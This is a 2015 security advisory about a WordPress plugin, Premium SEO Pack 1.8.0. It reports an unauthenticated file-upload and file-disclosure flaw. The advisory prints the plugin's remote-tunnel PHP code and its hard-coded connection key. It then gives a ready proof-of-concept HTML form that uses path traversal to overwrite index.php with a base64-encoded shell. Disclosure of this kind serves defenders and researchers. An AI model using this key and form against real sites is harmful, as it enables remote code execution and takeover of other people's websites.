Home / os / blackberry

WordPress Premium SEO Pack 1.8.0 Shell Upload / File Disclosure

Posted on 27 April 2015

Premium SEO Pack Wordpress Plugin Unauthenicated Arbitrary File Upload & LFD Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437 This Plugin is Vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload. Vulnerability Code(Shorted): class abmRemoteSupport{ public function __construct(){ $this->load_config(); $this->validate_connection(); $this->triggers(); } private function load_config(){ require_once( 'remote_init.php' ); $this->config = $aa_tunnel_config; /* in remote_init.php * $aa_tunnel_config = array( * "key" => "69efc4922575861f31125878597e97cf", * ); */ } private function validate_connection(){ $coming_key = isset($_REQUEST['connection_key']) ? $_REQUEST['connection_key'] : ''; if( trim($coming_key) == "" || $coming_key != $this->config['key'] ){ $this->print_error( array('code' => 101,'msg' => "Invalid key!"), 'fatal' ); } return true; } private function triggers(){ $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ''; if( $action == 'browse_folder' ) $this->browse_folder(); if( $action == 'open_file' ) $this->open_file(); if( $action == 'save_file' ) $this->save_file(); $this->print_response(); } private function save_file(){ $file = isset($_REQUEST['file']) ? urldecode($_REQUEST['file']) : ''; $file_content = isset($_REQUEST['file_content']) ? @base64_decode($_REQUEST['file_content']) : ''; if( file_exists( $file )) { $write_file = @file_put_contents( $file, $file_content ); if( $write_file ){ $this->response = array('status' => 'valid','file_path' => $file,'file_type' => end( explode(".", $file ) )); }else{ $this->response = array('status' => 'invalid','msg' => 'Unable to write on file','file_type' => end( explode(".", $file ) ), 'file_path' => $file); } } } private function open_file() { $file = isset($_REQUEST['file']) ? $this->config['path'] . $_REQUEST['file'] : ''; if( file_exists( $file ) ) { $file_content = file_get_contents( $file ); $this->response = array( 'status' => 'valid', 'file_path' => $file, 'file_type' => end( explode(".", $file ) ), 'file_name' => end( explode("/", $file ) ), 'file_alias' => md5( $file ), 'content' => $file_content ); } } new abmRemoteSupport(); Vulnerable Code End. so as you see it using authenication! in 'validate_connection' function its validating connection through checking the requested key with the defined one ($this->config['key']). the pass is an md5 value '69efc4922575861f31125878597e97cf' but when authenicating its comparing $_REQUEST['connection_key'] with '69efc4922575861f31125878597e97cf' Directly without encoding the requested key in md5. so it can be directly passed by passing the original value '69efc4922575861f31125878597e97cf'. Conclusion: 'remote_tunnel.php'?!! this looks a suspicious name though! its confusing if the vendor did this on purpose or not, because there is protections in other methods. Proof of Concept: <form action=" http://wordpress/wp-content/plugins/premium-seo-pack/modules/remote_support/remote_tunnel.php" method="post" > <input type="hidden" name="connection_key" value="69efc4922575861f31125878597e97cf" > <input name="action" value="save_file" ><br> <input name="file" value="../../../index.php"><br> <textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br> <input type="submit" ><br> </form> Timeline: Discovered - March 2015 Vendor Contact - March 2015 No Reply - April 2015 Public Disclosure - April 2015 @Evex_1337 http://research.evex.pw/?vuln=12

 

TOP